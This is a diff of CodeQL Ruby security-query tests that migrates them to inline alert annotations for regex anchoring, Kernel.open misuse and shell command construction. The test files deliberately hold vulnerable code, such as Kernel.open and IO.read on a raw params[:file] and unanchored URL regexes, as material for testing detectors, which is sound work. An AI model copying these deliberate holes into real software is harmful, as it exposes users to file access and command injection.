utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb index c488990062ab..2ae1020e6d67 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingFullAnchor/impl/miss-anchor.rb @@ -1,17 +1,17 @@ class Foobar - def foo1(name) - raise Blabity, 'Invalid thing' if name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK + def foo1(name) # $ Source + raise Blabity, 'Invalid thing' if name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK # $ Alert end - def foo2(name) - raise Blabity, 'Invalid thing' unless name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK + def foo2(name) # $ Source + raise Blabity, 'Invalid thing' unless name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK # $ Alert end def foo3(name) raise Blabity, 'Invalid thing' unless name !~ /\A[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*\z/ # OK end - def foo4(name) - raise Blabity, 'Invalid thing' unless not name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK + def foo4(name) # $ Source + raise Blabity, 'Invalid thing' unless not name !~ /^[A-Za-z0-9\+\-_]+(\/[A-Za-z0-9\+\-_]+)*$/ # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref index bd3ad563aec1..ffb6ae961f63 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/MissingRegExpAnchor.ql \ No newline at end of file +query: queries/security/cwe-020/MissingRegExpAnchor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb index 11410d7db1f4..ac2fd382934a 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/MissingRegExpAnchor/missing_regexp_anchor.rb @@ -1,11 +1,11 @@ -/www\.example\.com/ # BAD +/www\.example\.com/ # BAD # $ Alert /^www\.example\.com$/ # BAD: uses end-of-line anchors rather than end-of-string anchors /\Awww\.example\.com\z/ # GOOD /foo\.bar/ # GOOD -/https?:\/\/good\.com/ # BAD -/^https?:\/\/good\.com/ # BAD: missing end-of-string anchor +/https?:\/\/good\.com/ # BAD # $ Alert +/^https?:\/\/good\.com/ # BAD: missing end-of-string anchor # $ Alert /(^https?:\/\/good1\.com)|(^https?:#good2\.com)/ # BAD: missing end-of-string anchor /bar/ # GOOD @@ -16,40 +16,40 @@ foo.sub!(/www\.example\.com/, "bar") # GOOD /^a|/ -/^a|b/ # BAD +/^a|b/ # BAD # $ Alert /a|^b/ /^a|^b/ -/^a|b|c/ # BAD +/^a|b|c/ # BAD # $ Alert /a|^b|c/ /a|b|^c/ /^a|^b|c/ /(^a)|b/ -/^a|(b)/ # BAD +/^a|(b)/ # BAD # $ Alert /^a|(^b)/ -/^(a)|(b)/ # BAD +/^(a)|(b)/ # BAD # $ Alert -/a|b$/ # BAD +/a|b$/ # BAD # $ Alert /a$|b/ /a$|b$/ -/a|b|c$/ # BAD +/a|b|c$/ # BAD # $ Alert /a|b$|c/ /a$|b|c/ /a|b$|c$/ /a|(b$)/ -/(a)|b$/ # BAD +/(a)|b$/ # BAD # $ Alert /(a$)|b$/ -/(a)|(b)$/ # BAD +/(a)|(b)$/ # BAD # $ Alert -/^good.com|better.com/ # BAD -/^good\.com|better\.com/ # BAD -/^good\\.com|better\\.com/ # BAD -/^good\\\.com|better\\\.com/ # BAD -/^good\\\\.com|better\\\\.com/ # BAD +/^good.com|better.com/ # BAD # $ Alert +/^good\.com|better\.com/ # BAD # $ Alert +/^good\\.com|better\\.com/ # BAD # $ Alert +/^good\\\.com|better\\\.com/ # BAD # $ Alert +/^good\\\\.com|better\\\\.com/ # BAD # $ Alert -/^foo|bar|baz$/ # BAD +/^foo|bar|baz$/ # BAD # $ Alert /^foo|%/ # OK REGEXP = /foo/ 
@@ -57,5 +57,5 @@ REGEXP.match "http://example.com" # GOOD: the url is the text not the regexp "http://example.com".match? REGEXP # GOOD: the url is the text not the regexp "http://example.com".match REGEXP # GOOD: the url is the text not the regexp -"some text".match? "http://example.com" # BAD -"some text".match "http://example.com" # BAD +"some text".match? "http://example.com" # BAD # $ Alert +"some text".match "http://example.com" # BAD # $ Alert diff --git a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref index f1d6eea73c2c..476daefd7f31 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref +++ b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref @@ -1 +1,2 @@ -queries/security/cwe-020/OverlyLargeRange.ql +query: queries/security/cwe-020/OverlyLargeRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb index ed6ffe21b14a..18aaf573afa0 100644 --- a/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb +++ b/ruby/ql/test/query-tests/security/cwe-020/SuspiciousRegexpRange/suspicous_regexp_range.rb @@ -1,8 +1,8 @@ -overlap1 = /^[0-93-5]$/ # NOT OK +overlap1 = /^[0-93-5]$/ # NOT OK # $ Alert -overlap2 = /[A-ZA-z]/ # NOT OK +overlap2 = /[A-ZA-z]/ # NOT OK # $ Alert -isEmpty = /^[z-a]$/ # NOT OK +isEmpty = /^[z-a]$/ # NOT OK # $ Alert isAscii = /^[\x00-\x7F]*$/ # OK 
@@ -12,22 +12,22 @@ NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/ # OK -smallOverlap = /[0-9a-fA-f]/ # NOT OK +smallOverlap = /[0-9a-fA-f]/ # NOT OK # $ Alert -weirdRange = /[$-`]/ # NOT OK +weirdRange = /[$-`]/ # NOT OK # $ Alert -keywordOperator = /[!\~\*\/%+-<>\^|=&]/ # NOT OK +keywordOperator = /[!\~\*\/%+-<>\^|=&]/ # NOT OK # $ Alert -notYoutube = /youtu\.be\/[a-z1-9.-_]+/ # NOT OK +notYoutube = /youtu\.be\/[a-z1-9.-_]+/ # NOT OK # $ Alert -numberToLetter = /[7-F]/ # NOT OK +numberToLetter = /[7-F]/ # NOT OK # $ Alert -overlapsWithClass1 = /[0-9\d]/ # NOT OK +overlapsWithClass1 = /[0-9\d]/ # NOT OK # $ Alert -overlapsWithClass2 = /[\w,.-?:*+]/ # NOT OK +overlapsWithClass2 = /[\w,.-?:*+]/ # NOT OK # $ Alert escapes = /[\000-\037\047\134\177-\377]/n # OK - they are escapes nested = /[a-z&&[^a-c]]/ # OK -overlapsWithNothing = /[\w_%-.]/; \ No newline at end of file +overlapsWithNothing = /[\w_%-.]/; # $ Alert \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected index 67e618a3a1fd..25fd9e3e37a3 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected 
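Review bot: The last changed line, `overlapsWithNothing = /[\w_%-.]/; # $ Alert`, is the only alerting line in this file without a `# NOT OK` verdict, and its variable name suggests the opposite of what is now expected. A short reason would tell the next reader that the alert is intended, e.g. `overlapsWithNothing = /[\w_%-.]/; # NOT OK - %-. is a range # $ Alert`.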
@@ -1,3 +1,14 @@ +#select +| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. 
| KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | edges | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:4:10:4:13 | file | provenance | | | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:5:13:5:16 | file | provenance | | 
@@ -28,14 +39,3 @@ nodes | KernelOpen.rb:13:23:13:26 | file | semmle.label | file | | KernelOpen.rb:26:10:26:13 | file | semmle.label | file | subpaths -#select -| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. 
| KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref index aea01648c788..b8b59265f26b 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref @@ -1 +1,2 @@ -queries/security/cwe-078/KernelOpen.ql \ No newline at end of file +query: queries/security/cwe-078/KernelOpen.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb index 412e2c50ead8..c5e3707ef39f 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb 
@@ -1,16 +1,16 @@ class UsersController < ActionController::Base def create - file = params[:file] - open(file) # BAD - IO.read(file) # BAD - IO.write(file) # BAD - IO.binread(file) # BAD - IO.binwrite(file) # BAD - IO.foreach(file) # BAD - IO.readlines(file) # BAD - URI.open(file) # BAD + file = params[:file] # $ Source + open(file) # BAD # $ Alert + IO.read(file) # BAD # $ Alert + IO.write(file) # BAD # $ Alert + IO.binread(file) # BAD # $ Alert + IO.binwrite(file) # BAD # $ Alert + IO.foreach(file) # BAD # $ Alert + IO.readlines(file) # BAD # $ Alert + URI.open(file) # BAD # $ Alert - IO.read(File.join(file, "")) # BAD - file as first argument to File.join + IO.read(File.join(file, "")) # BAD - file as first argument to File.join # $ Alert IO.read(File.join("", file)) # GOOD - file path is sanitised by guard File.open(file).read # GOOD @@ -23,6 +23,6 @@ def create IO.read(file) # GOOD - file path is sanitised by guard end - open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized + open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref index 0b23d9102b9a..7b559b55ae08 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref +++ b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref @@ -1 +1,2 @@ -queries/security/cwe-078/NonConstantKernelOpen.ql \ No newline at end of file +query: queries/security/cwe-078/NonConstantKernelOpen.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb index 6b8294fa1112..50d99c9b7843 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb @@ -4,18 +4,18 @@ class UsersController < ActionController::Base def create file = params[:file] - open(file) # BAD - IO.read(file) # BAD - IO.write(file) # BAD - IO.binread(file) # BAD - IO.binwrite(file) # BAD - IO.foreach(file) # BAD - IO.readlines(file) # BAD - URI.open(file) # BAD + open(file) # BAD # $ Alert + IO.read(file) # BAD # $ Alert + IO.write(file) # BAD # $ Alert + IO.binread(file) # BAD # $ Alert + IO.binwrite(file) # BAD # $ Alert + IO.foreach(file) # BAD # $ Alert + IO.readlines(file) # BAD # $ Alert + URI.open(file) # BAD # $ Alert File.open(file).read # GOOD - Kernel.open(file) # BAD + Kernel.open(file) # BAD # $ Alert File.open(file, "r") # GOOD @@ -25,7 +25,7 @@ def create Kernel.open("this is #{fine}") # GOOD - Kernel.open("#{this_is} bad") # BAD + Kernel.open("#{this_is} bad") # BAD # $ Alert open("| #{this_is_an_explicit_command} foo bar") # GOOD @@ -43,6 +43,6 @@ def create open.where(external: false) # GOOD - an open method is called withoout arguments - open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized + open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index 622777da09ea..adefbb03c645 100644 
--- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected 
@@ -1,3 +1,19 @@ +#select +| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | +| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | +| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | +| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | +| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | +| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | +| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | +| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | +| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | +| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | +| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | edges | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | provenance | | | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | provenance | | 
@@ -48,19 +64,3 @@ nodes | impl/unsafeShell.rb:64:14:64:16 | arr | semmle.label | arr | | impl/unsafeShell.rb:68:14:68:16 | arr | semmle.label | arr | subpaths -#select -| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | -| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | -| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | -| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | -| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | -| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | -| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | -| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. 
| impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | -| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | -| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | -| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref index 99292da7663c..da9659dee163 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref @@ -1 +1,2 @@ -queries/security/cwe-078/UnsafeShellCommandConstruction.ql \ No newline at end of file +query: queries/security/cwe-078/UnsafeShellCommandConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
